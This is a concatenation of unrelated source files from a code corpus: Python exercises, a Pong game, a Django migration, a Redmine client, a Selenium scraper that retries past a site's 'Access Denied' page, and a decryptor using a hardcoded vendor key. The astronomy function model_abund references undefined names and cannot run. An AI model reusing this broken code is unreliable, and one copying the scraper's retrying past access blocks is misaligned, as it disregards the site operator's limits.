500: a += 1 elif L[i] > 500: # else if ~> elif b += 1 else: c += 1 print(a, b, c) ##3 Non-working code a = 25 b = 226 a = max(a, b) b = min(a, b) r = a i = 0 while r >= b: i += 1 r -= b print(a, " = ", b, " * ", i, "+", r) ##1 a = 25 b = 226 a1 = max(a, b) b = min(a, b) r = a1 i = 0 while r >= b: i += 1 r -= b print(a1, " = ", b, " * ", i, " + ", r) # 4 Writing code # the function decompose(l), which takes a list l of integers and returns two lists def decompose(l): rp, ri = [], [] for i in range(len(l)): if l[i] % 2 == 0: rp.append(l[i]) else: ri.append(l[i]) return rp, ri # ## a function present(l, a) which takes a list of integers l and an integer a and ## returns the number of multiples of a in the list. def present(l, a): c = 0 for i in range(len(l)): if l[i] % a == 0: c += 1 return c
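# Quick checks for the two functions above (added examples, values arbitrary):
# decompose([1, 2, 3, 4]) -> ([2, 4], [1, 3])
# present([3, 6, 7, 9], 3) -> 3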
3.34375
3
build.py
iscc/iscc-core
5
12789869
<gh_stars>1-10 # -*- coding: utf-8 -*- """ Build cython extension modules. The shared library can also be built manually using the command: $ cythonize -X language_level=3 -a -i ./iscc_core/cdc.py $ cythonize -X language_level=3 -a -i ./iscc_core/minhash.py $ cythonize -X language_level=3 -a -i ./iscc_core/simhash.py """ def build(setup_kwargs): try: from Cython.Build import cythonize, build_ext setup_kwargs.update( dict( ext_modules=cythonize( [ "iscc_core/cdc.py", "iscc_core/minhash.py", "iscc_core/simhash.py", ] ), cmdclass=dict(build_ext=build_ext), ) ) print("************************************************************") print("Succeeded to compile Cython/C accelerator modules :) *") print("************************************************************") except Exception as e: print("************************************************************") print("Cannot compile C accelerator module, use pure python version") print("************************************************************") print(e)
2.15625
2
ctrl-alt-del.py
troglobit/awesome-config
5
12789870
<filename>ctrl-alt-del.py<gh_stars>1-10 #!/usr/bin/env python import pygtk pygtk.require('2.0') import gtk import os if __name__ == "__main__": dialog = gtk.MessageDialog(type=gtk.MESSAGE_WARNING) dialog.set_position(gtk.WIN_POS_CENTER) dialog.set_markup("<big><b>Shutdown computer now?</b></big>") dialog.add_button("Log Out", 0) dialog.add_button("Sleep", 1) dialog.add_button("Restart", 2) dialog.add_button("Shut Down", 3) dialog.add_button("Cancel", 10) action = dialog.run() if action == 0: os.system("awesome-client 'awesome.quit()'") elif action == 1: os.system("systemctl suspend") elif action == 2: os.system("systemctl reboot") elif action == 3: os.system("systemctl poweroff") exit(0)
2.734375
3
malcolm/modules/ADPandABlocks/parts/pandablocksdriverpart.py
MattTaylorDLS/pymalcolm
0
12789871
<reponame>MattTaylorDLS/pymalcolm from malcolm.modules.ADCore.parts import DetectorDriverPart from .pandablockschildpart import PandABlocksChildPart class PandABlocksDriverPart(DetectorDriverPart, PandABlocksChildPart): pass
1.445313
1
crud/migrations/0009_auto_20210701_0910.py
TownOneWheel/townonewheel
0
12789872
<filename>crud/migrations/0009_auto_20210701_0910.py # Generated by Django 3.2.4 on 2021-07-01 09:10 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('crud', '0008_auto_20210701_0715'), ] operations = [ migrations.AlterField( model_name='cat', name='color', field=models.CharField(blank=True, max_length=20, null=True), ), migrations.AlterField( model_name='cat', name='gender', field=models.CharField(blank=True, max_length=20, null=True), ), migrations.AlterField( model_name='cat', name='neutering', field=models.CharField(blank=True, max_length=10, null=True), ), ]
1.671875
2
investing_algorithm_framework/app/stateless/action_handlers/action_handler_strategy.py
investing-algorithms/investing-algorithm-framework
1
12789873
<reponame>investing-algorithms/investing-algorithm-framework from abc import ABC, abstractmethod class ActionHandlerStrategy(ABC): @abstractmethod def handle_event(self, payload, context): pass
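# A minimal concrete strategy (illustrative sketch only; not part of the framework):
# class PrintStrategy(ActionHandlerStrategy):
#     def handle_event(self, payload, context):
#         print(payload, context)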
2.078125
2
atmosnet/utils.py
dnidever/atmosnet
0
12789874
<gh_stars>0 #!/usr/bin/env python """UTILS.PY - Utility functions """ from __future__ import print_function __authors__ = '<NAME> <<EMAIL>>' __version__ = '20210605' # yyyymmdd import os import numpy as np import warnings from scipy import sparse from scipy.interpolate import interp1d from dlnpyutils import utils as dln import matplotlib.pyplot as plt try: import __builtin__ as builtins # Python 2 except ImportError: import builtins # Python 3 # Ignore these warnings, it's a bug warnings.filterwarnings("ignore", message="numpy.dtype size changed") warnings.filterwarnings("ignore", message="numpy.ufunc size changed") cspeed = 2.99792458e5 # speed of light in km/s def getprintfunc(inplogger=None): """ Allows you to modify print() locally with a logger.""" # Input logger if inplogger is not None: return inplogger.info # Check if a global logger is defined elif hasattr(builtins,"logger"): return builtins.logger.info # Return the buildin print function else: return builtins.print # The atmosnet data directory def datadir(): """ Return the atmosnet data/ directory.""" fil = os.path.abspath(__file__) codedir = os.path.dirname(fil) datadir = codedir+'/data/' return datadir # Split a filename into directory, base and fits extensions def splitfilename(filename): """ Split filename into directory, base and extensions.""" fdir = os.path.dirname(filename) base = os.path.basename(filename) exten = ['.fit','.fits','.fit.gz','.fits.gz','.fit.fz','.fits.fz'] for e in exten: if base[-len(e):]==e: base = base[0:-len(e)] ext = e break return (fdir,base,ext) def model_abund(pars): """ Model atmosphere abundances. """ # Create the input 99-element abundance array pertab = Table.read('/home/dnidever/payne/periodic_table.txt',format='ascii') #inpabund = np.zeros(99,np.float64) #g, = np.where(np.char.array(labels.dtype.names).find('_H') != -1) #ind1,ind2 = dln.match(np.char.array(labels.dtype.names)[g],np.char.array(pertab['symbol']).upper()+'_H') #inpabund[ind2] = np.array(labels[0])[g[ind1]] #feh = inpabund[25] #read model atmosphere atmostype, teff, logg, vmicro2, mabu, nd, atmos = synple.read_model(modelfile) mlines = dln.readlines(modelfile) # solar abundances # first two are Teff and logg # last two are Hydrogen and Helium solar_abund = np.array([ 4750., 2.5, -10.99, -10.66, -9.34, -3.61, -4.21, -3.35, -7.48, -4.11, -5.80, -4.44, -5.59, -4.53, -6.63, -4.92, -6.54, -5.64, -7.01, -5.70, -8.89, -7.09, -8.11, -6.40, -6.61, -4.54, -7.05, -5.82, -7.85, -7.48, -9.00, -8.39, -9.74, -8.70, -9.50, -8.79, -9.52, -9.17, -9.83, -9.46, -10.58, -10.16, -20.00, -10.29, -11.13, -10.47, -11.10, -10.33, -11.24, -10.00, -11.03, -9.86, -10.49, -9.80, -10.96, -9.86, -10.94, -10.46, -11.32, -10.62, -20.00, -11.08, -11.52, -10.97, -11.74, -10.94, -11.56, -11.12, -11.94, -11.20, -11.94, -11.19, -12.16, -11.19, -11.78, -10.64, -10.66, -10.42, -11.12, -10.87, -11.14, -10.29, -11.39, -20.00, -20.00, -20.00, -20.00, -20.00, -20.00, -12.02, -20.00, -12.58, -20.00, -20.00, -20.00, -20.00, -20.00, -20.00, -20.00]) # scale global metallicity abu = solar_abund.copy() abu[2:] += feh # Now offset the elements with [X/Fe], [X/Fe]=[X/H]-[Fe/H] g, = np.where(np.char.array(labels.dtype.names).find('_H') != -1) ind1,ind2 = dln.match(np.char.array(labels.dtype.names)[g],np.char.array(pertab['symbol']).upper()+'_H') abu[ind2] += (np.array(labels[0])[g[ind1]]).astype(float) - feh # convert to linear abu[2:] = 10**abu[2:] # Divide by N(H) g, = np.where(np.char.array(mlines).find('ABUNDANCE SCALE') != -1) nhtot = np.float64(mlines[g[0]].split()[6]) 
abu[2:] /= nhtot # use model values for H and He abu[0:2] = mabu[0:2] return abu def elements(husser=False): """ Reads the solar elemental abundances From <NAME>'s synple package. Parameters ---------- husser: bool, optional when set the abundances adopted for Phoenix models by Huser et al. (2013) are adopted. Otherwise Asplund et al. (2005) are used -- consistent with the MARCS (Gustafsson et al. 2008) models and and Kurucz (Meszaros et al. 2012) Kurucz model atmospheres. Returns ------- symbol: numpy array of str element symbols mass: numpy array of floats atomic masses (elements Z=1-99) sol: numpy array of floats solar abundances N/N(H) """ symbol = [ 'H' ,'He','Li','Be','B' ,'C' ,'N' ,'O' ,'F' ,'Ne', 'Na','Mg','Al','Si','P' ,'S' ,'Cl','Ar','K' ,'Ca', 'Sc','Ti','V' ,'Cr','Mn','Fe','Co','Ni','Cu','Zn', 'Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y' ,'Zr', 'Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn', 'Sb','Te','I' ,'Xe','Cs','Ba','La','Ce','Pr','Nd', 'Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb', 'Lu','Hf','Ta','W' ,'Re','Os','Ir','Pt','Au','Hg', 'Tl','Pb','Bi','Po','At','Rn','Fr','Ra','Ac','Th', 'Pa','U' ,'Np','Pu','Am','Cm','Bk','Cf','Es' ] mass = [ 1.00794, 4.00260, 6.941, 9.01218, 10.811, 12.0107, 14.00674, 15.9994, 18.99840, 20.1797, 22.98977, 24.3050, 26.98154, 28.0855, 30.97376, 32.066, 35.4527, 39.948, 39.0983, 40.078, 44.95591, 47.867, 50.9415, 51.9961, 54.93805, 55.845, 58.93320, 58.6934, 63.546, 65.39, 69.723, 72.61, 74.92160, 78.96, 79.904, 83.80, 85.4678, 87.62, 88.90585, 91.224, 92.90638, 95.94, 98., 101.07, 102.90550, 106.42, 107.8682, 112.411, 114.818, 118.710, 121.760, 127.60, 126.90447, 131.29, 132.90545, 137.327, 138.9055, 140.116, 140.90765, 144.24, 145, 150.36, 151.964, 157.25, 158.92534, 162.50, 164.93032, 167.26, 168.93421, 173.04, 174.967, 178.49, 180.9479, 183.84, 186.207, 190.23, 192.217, 195.078, 196.96655, 200.59, 204.3833, 207.2, 208.98038, 209., 210., 222., 223., 226., 227., 232.0381, 231.03588, 238.0289, 237., 244., 243., 247., 247., 251., 252. ] if not husser: #Asplund, Grevesse and Sauval (2005), basically the same as #<NAME>., <NAME>., <NAME>. 2007, Space Science Review 130, 205 sol = [ 0.911, 10.93, 1.05, 1.38, 2.70, 8.39, 7.78, 8.66, 4.56, 7.84, 6.17, 7.53, 6.37, 7.51, 5.36, 7.14, 5.50, 6.18, 5.08, 6.31, 3.05, 4.90, 4.00, 5.64, 5.39, 7.45, 4.92, 6.23, 4.21, 4.60, 2.88, 3.58, 2.29, 3.33, 2.56, 3.28, 2.60, 2.92, 2.21, 2.59, 1.42, 1.92, -9.99, 1.84, 1.12, 1.69, 0.94, 1.77, 1.60, 2.00, 1.00, 2.19, 1.51, 2.27, 1.07, 2.17, 1.13, 1.58, 0.71, 1.45, -9.99, 1.01, 0.52, 1.12, 0.28, 1.14, 0.51, 0.93, 0.00, 1.08, 0.06, 0.88, -0.17, 1.11, 0.23, 1.45, 1.38, 1.64, 1.01, 1.13, 0.90, 2.00, 0.65, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99, 0.06, -9.99, -0.52, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99 ] sol[0] = 1. else: #a combination of meteoritic/photospheric abundances from Asplund et al. 2009 #chosen for the Husser et al. 
(2013) Phoenix model atmospheres sol = [ 12.00, 10.93, 3.26, 1.38, 2.79, 8.43, 7.83, 8.69, 4.56, 7.93, 6.24, 7.60, 6.45, 7.51, 5.41, 7.12, 5.50, 6.40, 5.08, 6.34, 3.15, 4.95, 3.93, 5.64, 5.43, 7.50, 4.99, 6.22, 4.19, 4.56, 3.04, 3.65, 2.30, 3.34, 2.54, 3.25, 2.36, 2.87, 2.21, 2.58, 1.46, 1.88, -9.99, 1.75, 1.06, 1.65, 1.20, 1.71, 0.76, 2.04, 1.01, 2.18, 1.55, 2.24, 1.08, 2.18, 1.10, 1.58, 0.72, 1.42, -9.99, 0.96, 0.52, 1.07, 0.30, 1.10, 0.48, 0.92, 0.10, 0.92, 0.10, 0.85, -0.12, 0.65, 0.26, 1.40, 1.38, 1.62, 0.80, 1.17, 0.77, 2.04, 0.65, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99, 0.06, -9.99, -0.54, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99 ] sol[0] = 1. for i in range(len(sol)-1): sol[i+1] = 10.**(sol[i+1]-12.0) return (symbol,mass,sol)
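# Example usage of elements() (added sketch): look up the solar Fe abundance.
# symbol, mass, sol = elements()
# print(sol[symbol.index('Fe')])  # linear N(Fe)/N(H) on the Asplund et al. (2005) scale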
2.328125
2
app/blueprints/sample_h5_api/v_user.py
lvyaoo/wx-open-project
0
12789875
<reponame>lvyaoo/wx-open-project # -*- coding: utf-8 -*- from flask import g from . import bp_sample_h5_api from .decorators import login_required from ...api_utils import * @bp_sample_h5_api.route('/current_user/', methods=['GET']) @login_required def get_current_user(): """ Get the details of the current WeChat user :return: """ data = { 'wx_user': g.user.to_dict(g.fields) } return api_success_response(data)
2.109375
2
setup.py
WangTingZheng/explorer
17
12789876
import setuptools with open("README.md", "r", encoding="UTF-8") as fh: long_description = fh.read() setuptools.setup( name="file-explorer", version="0.0.0", author="WangTingZheng", author_email="<EMAIL>", description="A simple python cli file browser", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/WangTingZheng/explorer", packages=setuptools.find_packages(), install_requires=["pick"], entry_points={"console_scripts": ["explorer = explorer.command:main"]}, )
1.585938
2
warbend/game/mount_and_blade/native/__init__.py
int19h/warbend
4
12789877
from __future__ import absolute_import, division, print_function import sys from ....data import root, parent, transaction from ...module_system import * from ... import save from .. import records from .slots import Slots globals().update(records(Slots())) def load(*args, **kwargs): from ... import load return load(sys.modules[__name__], *args, **kwargs)
1.828125
2
external/simpleWpsApp/pse_server/flow/urls.py
Ueda-Ichitaka/workflowPSE
0
12789878
<gh_stars>0 from django.conf.urls import url, include from . import views urlpatterns = [ # Serve web app url(r'^$', views.index), # Service api url(r'^service/$', views.ServiceList.as_view()), url(r'^service/(?P<pk>[0-9]+)/$', views.ServiceDetail.as_view()), # Service Provider api url(r'^service-provider/$', views.ServiceProviderList.as_view()), url(r'^service-provider/(?P<pk>[0-9]+)/$', views.ServiceProviderDetail.as_view()), # Auth url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')), ]
1.75
2
trik/ya/regularization.py
hellotrik/trik
0
12789879
from ..sheng import V,Pow,Mul,ReduceSum,Abs class RegularizationLayer: def regularization_term(self, *args, **kwargs): pass class RegularizationL1(RegularizationLayer): @staticmethod def regularization_term(target_symbol: V, decay: float): return target_symbol(Abs())(ReduceSum())(Mul(),decay) class RegularizationL2(RegularizationLayer): @staticmethod def regularization_term(target_symbol: V, decay: float): return target_symbol(Pow(),2)(ReduceSum())(Pow(),0.5)(Mul(),decay) regularization_l1 = RegularizationL1.regularization_term regularization_l2 = RegularizationL2.regularization_term regularization_map = { 'l1': RegularizationL1, 'l2': RegularizationL2, } def register_regularization(name: str, regularization: RegularizationLayer): regularization_map[name.lower()] = regularization class Regularization: def __init__(self, name: str, *args, **kwargs): self.__name = name.lower() self.__regularization = None if self.__name in regularization_map: self.__regularization = regularization_map[self.__name](*args, **kwargs) else: raise ValueError('No such regularization: {}'.format(name)) def regularization_layer(self): return self.__regularization
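# Illustrative use (added sketch; `weights` stands for some V symbol from
# ..sheng and is not defined in this module):
# reg = Regularization('l2')
# term = reg.regularization_layer().regularization_term(weights, 1e-4)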
2.875
3
task_0/3_euclidean_distance.py
Shobuj-Paul/Strawberry-Stacker
0
12789880
#Given 2 points (x1,y1) and (x2,y2), where x1, x2 are x-coordinates #and y1, y2 are y-coordinates of the points. #Your task is to compute the Euclidean distance between them. #The distance computed should be precise up to 2 decimal places. from math import sqrt def compute_distance(x1, y1, x2, y2): distance = sqrt((x2-x1)**2 + (y2-y1)**2) return distance def main(): T = int(input()) d = [] for i in range(0,T): (x1, y1, x2, y2) = map(int, input().split(" ")) d.append(compute_distance(x1,y1,x2,y2)) for i in range(0,T): print("Distance: %.2f" %d[i]) if __name__=='__main__': try: main() except: pass
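# Sanity check (added; not part of the graded I/O): a 3-4-5 right triangle.
# assert abs(compute_distance(0, 0, 3, 4) - 5.0) < 1e-9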
3.921875
4
solutions/0136.single-number/single-number.py
cocobear/LeetCode-in-Python
0
12789881
# # @lc app=leetcode id=136 lang=python3 # # [136] Single Number # from __future__ import annotations # @lc code=start class Solution: def singleNumber(self, nums: List[int]) -> int: res = nums[0] for i in nums[1:]: res ^= i return res tests = [ ([2,2,1], 1), ([4,1,2,1,2], 4) ] # @lc code=end
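# Why XOR works (added note): x ^ x == 0 and x ^ 0 == x, and XOR is commutative
# and associative, so every value that appears twice cancels out and only the
# single value survives. The bundled tests can be checked with:
# for nums, want in tests: assert Solution().singleNumber(nums) == want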
3.109375
3
signalr/hubs/__init__.py
talboren/signalr-client-py
58
12789882
from ._hub import Hub
1.117188
1
pygame/pong.py
sheepman39/school
3
12789883
<filename>pygame/pong.py<gh_stars>1-10 import pygame, random, sys # this is based off of a tutorial from https://www.youtube.com/watch?v=Qf3-aDXG8q4 # starts pygame pygame.mixer.pre_init(44100, -16, 2, 512) pygame.init() clock = pygame.time.Clock() # main window screen_width = 1280 screen_height = 960 screen = pygame.display.set_mode((screen_width, screen_height)) # gives the display its title pygame.display.set_caption("Pong") # game rectangles ball = pygame.Rect(screen_width/2 - 15, screen_height/2 - 15, 30, 30) player = pygame.Rect(screen_width - 20, screen_height/2 - 70, 10,140) opponent = pygame.Rect(10, screen_height/2 - 70, 10, 140) # color variable light_grey = (200,200,200) ball_speed = [7 * random.choice((1,-1)), 7 * random.choice((1,-1))] player_speed = 0 opponent_speed = 7 def ball_animation(): global ball_speed, player_score, opponent_score, score_time # changes ball speed ball.x += ball_speed[0] ball.y += ball_speed[1] ball_speed = list(ball_speed) # this changes the direction upon collision if ball.top <= 0 or ball.bottom >= screen_height: pygame.mixer.Sound.play(pong_sound) ball_speed[1] = ball_speed[1] * -1 if ball.left <= 0: pygame.mixer.Sound.play(score_sound) player_score += 1 score_time = pygame.time.get_ticks() elif ball.right >= screen_width: pygame.mixer.Sound.play(score_sound) opponent_score += 1 score_time = pygame.time.get_ticks() if ball.colliderect(player) and ball_speed[0] > 0: pygame.mixer.Sound.play(pong_sound) if abs(ball.right - player.left) < 10: ball_speed[0] = ball_speed[0] * -1 elif abs(ball.bottom - player.top) < 10 and ball_speed[1] > 0: ball_speed[1] *= -1 elif abs(ball.top - player.bottom) < 10 and ball_speed[1] < 0: ball_speed[1] *= -1 elif ball.colliderect(opponent) and ball_speed[0] < 0: pygame.mixer.Sound.play(pong_sound) if abs(ball.left - opponent.right) < 10: ball_speed[0] = ball_speed[0] * -1 elif abs(ball.bottom - opponent.top) < 10 and ball_speed[1] > 0: ball_speed[1] *= -1 elif abs(ball.top - opponent.bottom) < 10 and ball_speed[1] < 0: ball_speed[1] *= -1 def player_animation(): # moving of the players player.y += player_speed # checks for boundaries if player.top <= 0: player.top = 0 if player.bottom >= screen_height: player.bottom = screen_height def opponent_animation(): if opponent.top < ball.y: opponent.top += opponent_speed if opponent.bottom > ball.y: opponent.bottom -= opponent_speed # checks for boundaries if opponent.top <= 0: opponent.top = 0 if opponent.bottom >= screen_height: opponent.bottom = screen_height def ball_restart(): global ball_speed, score_time ball.center = (screen_width/2, screen_height/2) current_time = pygame.time.get_ticks() if current_time - score_time < 700: number_three = game_font.render("3", True, light_grey) screen.blit(number_three, (screen_width/2 - 10, screen_height/2 + 20)) elif 700 < current_time - score_time < 1400: number_two = game_font.render("2", True, light_grey) screen.blit(number_two, (screen_width/2 - 10, screen_height/2 + 20)) elif 1400 < current_time - score_time < 2100: number_one = game_font.render("1", True, light_grey) screen.blit(number_one, (screen_width/2 - 10, screen_height/2 + 20)) if current_time - score_time < 2100: ball_speed = [0, 0] else: ball_speed = (7 * random.choice((1,-1)), 7 * random.choice((1,-1))) score_time = None # score variables player_score = 0 opponent_score = 0 # text variables game_font = pygame.font.Font("freesansbold.ttf", 32) # Score timer score_time = True # Sound pong_sound = pygame.mixer.Sound("./pygame/pong.ogg") score_sound = 
pygame.mixer.Sound("./pygame/score.ogg") while True: # handles input for event in pygame.event.get(): # checks if the event is quit if event.type == pygame.QUIT: # using both of these ensures that it is closed reliably pygame.quit() # sys exit closes the entire program sys.exit() if event.type == pygame.KEYDOWN: if event.key == pygame.K_DOWN: player_speed += 7 if event.key == pygame.K_UP: player_speed -= 7 if event.type == pygame.KEYUP: if event.key == pygame.K_DOWN: player_speed -= 7 if event.key == pygame.K_UP: player_speed += 7 ball_animation() player_animation() opponent_animation() # background color screen.fill((0,0,0)) # draws the players and the ball pygame.draw.rect(screen,light_grey,player) pygame.draw.rect(screen,light_grey,opponent) pygame.draw.ellipse(screen, light_grey, ball) # to draw a line <screen>, <color> <x1,y1> <x2,y2> pygame.draw.aaline(screen, light_grey, (screen_width/2, 0), (screen_width/2,screen_height)) if score_time: ball_restart() # draws the score player_text = game_font.render(f"{player_score}", True, light_grey) screen.blit(player_text, (660, 470)) opponent_text = game_font.render(f"{opponent_score}", True, light_grey) screen.blit(opponent_text, (600, 470)) # .flip draws the picture from everything in the loop pygame.display.flip() # this limits how fast the loop runs, 60 hz clock.tick(60)
3.5625
4
py/stats_scanner.py
MarcGumowski/WorldCup2018TrueSkill
2
12789884
# ---------------------------------------------------------------------------- # # World Cup: Stats scanner # Ver: 0.01 # ---------------------------------------------------------------------------- # # # Code by <NAME> # # ---------------------------------------------------------------------------- # import os import numpy as np import pandas as pd import re from bs4 import BeautifulSoup from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.webdriver.common.keys import Keys from selenium.webdriver.firefox.options import Options from selenium.common.exceptions import TimeoutException, NoSuchElementException, WebDriverException from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from time import sleep os.chdir("/mnt/aec0936f-d983-44c1-99f5-0f5b36390285/Dropbox/Python/Predictive Analytics FIFA") ''' browser = webdriver.Firefox() browser.get("https://www.whoscored.com/Regions/247/Tournaments/36/Seasons/5967/Stages/15737/Show/International-FIFA-World-Cup-2018") sleep(3) base_url = 'https://www.whoscored.com' def get_countries_links(browser): return [team.get_attribute('href') for team in browser.find_elements_by_xpath('//table[@id="tournament-fixture"]//td[contains(@class,"team")]//a')] countries_link = set() countries_link.update(get_countries_links(browser)) browser.find_elements_by_xpath('//table[@id="tournament-fixture"]//td[contains(@class,"team")]//a')[0].get_attribute('href') # click next page browser.find_element_by_xpath('//span[contains(@class, "ui-icon-triangle-1-e")]').click() sleep(1) countries_link.update(get_countries_links(browser)) # click next page browser.find_element_by_xpath('//span[contains(@class, "ui-icon-triangle-1-e")]').click() sleep(1) countries_link.update(get_countries_links(browser)) #countries_link player_link = dict() for country_link in countries_link: browser.get(country_link) sleep(1) team = browser.find_element_by_xpath('//span[@class="team-header-name"]') player_link[team.text] = dict() for player in browser.find_elements_by_xpath('//table[@id="top-player-stats-summary-grid"]//tbody//tr//a'): player_link[team.text][player.text] = player.get_attribute('href') np.save("Data/player_link.npy", player_link) ''' def detect_element(browser, element_id, by_what = By.ID): # Simplify the detection of an element in the browser element_present = EC.presence_of_element_located((by_what, element_id)) try: WebDriverWait(browser, 5, poll_frequency = .1).until(element_present) return True except TimeoutException as e: return False player_link = np.load("Data/player_link.npy", allow_pickle=True).item() # rating_dict must exist before it is copied below; the original relied on a value left over from an earlier session rating_dict = {team: {} for team in player_link.keys()} # will delete nan from already_loaded already_loaded = rating_dict.copy() for team in rating_dict.keys(): for player in rating_dict[team]: if pd.isnull(rating_dict[team][player]): already_loaded[team].pop(player, None) #caps = DesiredCapabilities().FIREFOX caps = DesiredCapabilities.CHROME caps["pageLoadStrategy"] = "none" browser = webdriver.Chrome(desired_capabilities = caps)#Firefox(capabilities=caps) for team in player_link.keys(): for player in player_link[team].keys(): if player in already_loaded[team].keys(): continue while True: try: browser.get(player_link[team][player]) wait = WebDriverWait(browser, 20) wait.until(EC.presence_of_element_located((By.XPATH, '//table[@id="top-player-stats-summary-grid"]'))) browser.execute_script("window.stop();") try: 
rating_dict[team][player] = browser.find_elements_by_xpath('//table[@id="top-player-stats-summary-grid"]//td[@class="rating"]')[-1].text print(rating_dict[team][player]) break except IndexError: try: iframe = browser.find_element_by_xpath('//iframe') browser.switch_to_frame(iframe) browser.find_element_by_xpath('//p[contains(text(), "Access Denied")]') sleep(5) except NoSuchElementException: rating_dict[team][player] = np.nan except TimeoutException: sleep(5) np.save("Data/rating_dict.npy", rating_dict) rating_dict['Saudi Arabia']
2.265625
2
src/unsnap/decryptor.py
raschle/SnappyDecompiler
1
12789885
<reponame>raschle/SnappyDecompiler import math, bz2, os from snaplib.ppcrypto import ARC4 # _SNAPPY_EXPORT_KEY encoder = ARC4("SynapseExport" + str(math.pi)) def decryptSnapSpy(file): (filename_and_path, extension) = os.path.splitext(file) with open(file, "rb") as binary_file: data = binary_file.read() exportString = encoder.decrypt(data) decomp_data = bz2.decompress(exportString) newFileName = "{0}.unspy".format(filename_and_path) with open(newFileName, "wb") as unspy: unspy.write(decomp_data) return newFileName
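# Example (added sketch; the file name is hypothetical):
# decryptSnapSpy("export.snapspy") writes the decrypted, decompressed payload
# to "export.unspy" next to the input file and returns that new path.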
2.875
3
src/tools/dev/redmine/pyrmine/src/Connection.py
eddieTest/visit
0
12789886
<filename>src/tools/dev/redmine/pyrmine/src/Connection.py<gh_stars>0 #!/usr/bin/env python # # file: Connection.py # author: <NAME> <<EMAIL>> # created: 6/1/2010 # purpose: # Provides a 'Connection' class that interacts with a redmine instance to # extract results from redmine queries. # import urllib2,urllib,csv,getpass,warnings from collections import namedtuple from Issue import * try: import pyPdf except ImportError: print "Warning: pyrmine requires the 'pyPdf' ", print "module for full pdf functionality." class Connection(object): def __init__(self,base_url): """ Creates a redmine connection object to redmine instance at the given url. """ self.urls = {} if base_url[-1] == "/": base_url = base_url[:-1] self.urls["base"] = base_url self.urls["login"] = "%s/login/" % base_url self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) def login(self,uname=None,passwd=None): """ Login handshake. If username & passwd are not given this function asks for them via stdout/stdin. """ if uname is None: uname = raw_input("username:") if passwd is None: passwd = getpass.getpass("password:") f = self.opener.open(self.urls["login"]) data = f.read() f.close() split_key = '<input name="authenticity_token" type="hidden" value="' data = data.split(split_key)[1] atok= data.split('" />')[0] params = dict(username=uname, password=<PASSWORD>, authenticity_token=atok) params = urllib.urlencode(params) f = self.opener.open(self.urls["login"], params) data = f.readlines() f.close() def open_base_url(self,url): """ Constructs and opens an url relative to the base of this connection. """ url = "%s/%s" % (self.urls["base"],url) return self.opener.open(url) def open_project_url(self,project,url): """ Constructs and opens a project url relative to the base of this connection. """ url = "%s/projects/%s/%s" % (self.urls["base"],project,url) return self.opener.open(url) def fetch_issues(self,project,query_id=-1,iclass=Issue): """ Executes a query and returns a set of Issues holding the results. You can specify which class is used to wrap returned issues via 'iclass'. """ issues_url = "%s/projects/%s/issues.csv" % (self.urls["base"] ,project) if int(query_id) >= 0: params = {} params['query_id'] = str(query_id) issues_url += "?" + urllib.urlencode(params) print "[executing query: %s]" % issues_url f = self.opener.open(issues_url) csv_reader = csv.reader(f) issues = [ row for row in csv_reader] fields = [self.__format_field_name(val) for val in issues[0]] issues = issues[1:] print "[query returned %d issues]" % len(issues) IssueTuple = namedtuple("Issue",fields) issues = [iclass(IssueTuple(*i),self) for i in issues] return fields,issues def save_query_pdf(self,project,query_id,output_file): """ Collects pdfs of all issues returned by a query and combines them into a single output pdf. """ fields,issues = self.fetch_issues(project,query_id) nissues = len(issues) if nissues == 0: print "[query returned no issues -", print " skipping creation of '%s']" % output_file return # try to ignore some deprecation warnings from pyPdf with warnings.catch_warnings(): warnings.simplefilter("ignore") opdf = pyPdf.PdfFileWriter() for i in issues: print "[downloading issue %s]" % i.id idata = i.fetch_pdf_buffer() ipdf = pyPdf.PdfFileReader(idata) for p in range(ipdf.numPages): opdf.addPage(ipdf.getPage(p)) print "[creating %s]" % output_file opdf.write(file(output_file,"wb")) def __format_field_name(self,name): """ Helper that makes sure field names comply w/ rules required for creating a 'namedtuple' object. 
""" name = name.lower().replace(" ","_") if name == "#": name = "id" name = name.replace("%","percent") return name
2.75
3
tests/integration_tests/conftest.py
TheCodeSummoner/dof-discord-bot
2
12789887
""" Configuration module containing pytest-specific hooks. """ import os import logging from . import helpers from _pytest.config import Config as PyTestConfig from dof_discord_bot.src.logger import Log from dof_discord_bot.src import logger def _reconfigure_logging(): """ Helper function used to redirect all logging into the tests-specific log folder. Accesses the private method of `logger` to avoid repeating the code. """ # Clear existing logs for file_name in os.listdir(helpers.LOG_DIR): if file_name.endswith(".log"): os.remove(os.path.join(helpers.LOG_DIR, file_name)) # noinspection PyProtectedMember logger._configure(log_directory=helpers.LOG_DIR) Log._logger = logging.getLogger("dof-discord-bot") Log.info("Logging has been reconfigured") def pytest_configure(config: PyTestConfig): """ Configuration hook which reconfigures the logging and calls the global setup function. """ _reconfigure_logging() helpers.setup() Log.info("Pytest configuration hook finished successfully") def pytest_unconfigure(config: PyTestConfig): """ Configuration hook which calls the global teardown function. """ helpers.teardown() Log.info("Pytest unconfiguration hook finished successfully") # An explicit "kill" of current process to ensure clean exit in case of errors when stopping the code os._exit(0)
2.515625
3
settings.py
psf/bpo-rietveld
0
12789888
